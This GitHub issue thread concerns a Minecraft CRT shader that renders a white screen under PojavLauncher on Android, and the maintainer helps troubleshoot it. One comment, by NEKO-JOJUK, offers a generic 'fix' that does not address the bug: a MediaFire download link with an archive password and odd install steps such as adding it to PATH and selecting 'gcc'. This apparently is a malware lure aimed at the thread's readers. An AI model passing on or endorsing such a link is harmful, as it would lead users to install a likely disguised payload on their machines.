### ISSUE TITLE
White screen (?

### ISSUE THREAD

**Issue by Treymorr** [BouncingElf10/CRT-Shader#1]
When i select the shader, a white screen appears, i dont know what cause this, because i dont get any errors like "unvalid program", i tried downgrading my minecraf tfrom 1.20.4 to 1.20.1 but the bug continues

Also, it not creash the game or frezze,the game keeps running, it simple a full white screen with the scanlines of the shader, unselecting the shader "fix" the white screen

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BouncingElf10** [comment]
May I know if you are using Optifine or Iris 1.20.4 & 1.20.1, or any additional resource packs and mods you have installed?

**Comment by Treymorr** [comment]
I use the latest release of optifine for 1.20.4 (hd i7 u) and 1.20.1(hd i6 u), i only use OF and is not a compability problem with a RP because i tried to use the shader with any RP

I tried to re-download the shader (1.1v) and i download also the 1.0v and i get this errors (for some reason 1.1 dont send me the errors)

![Screenshot_20240828_184137_PojavLauncher (Minecraft Java Edition for Android)](https://github.com/user-attachments/assets/543981a1-4587-4816-96cb-6e75f05e7b65)

**Comment by Treymorr** [comment]
An also, im using pojavlauncher so im 99% sure is the launcher fault an not the shader, sorry for bothering you

**Comment by BouncingElf10** [comment]
It is quite probable that pojavlauncher is causing these issues because I can't seem to recreate it on my end using both Optifine and Iris on both versions.

If available you can always try and load the shader on your PC so we can see if pojavlauncher is the problem, if you can't for whatever reason it's totally ok :D 

Still, thanks for reaching out (you didn't bother me at all) Some tips I can suggest is updating your launcher and also to try searching up your problem on the internet to see if anyone has a fix. Hope you get your problem fixed :)
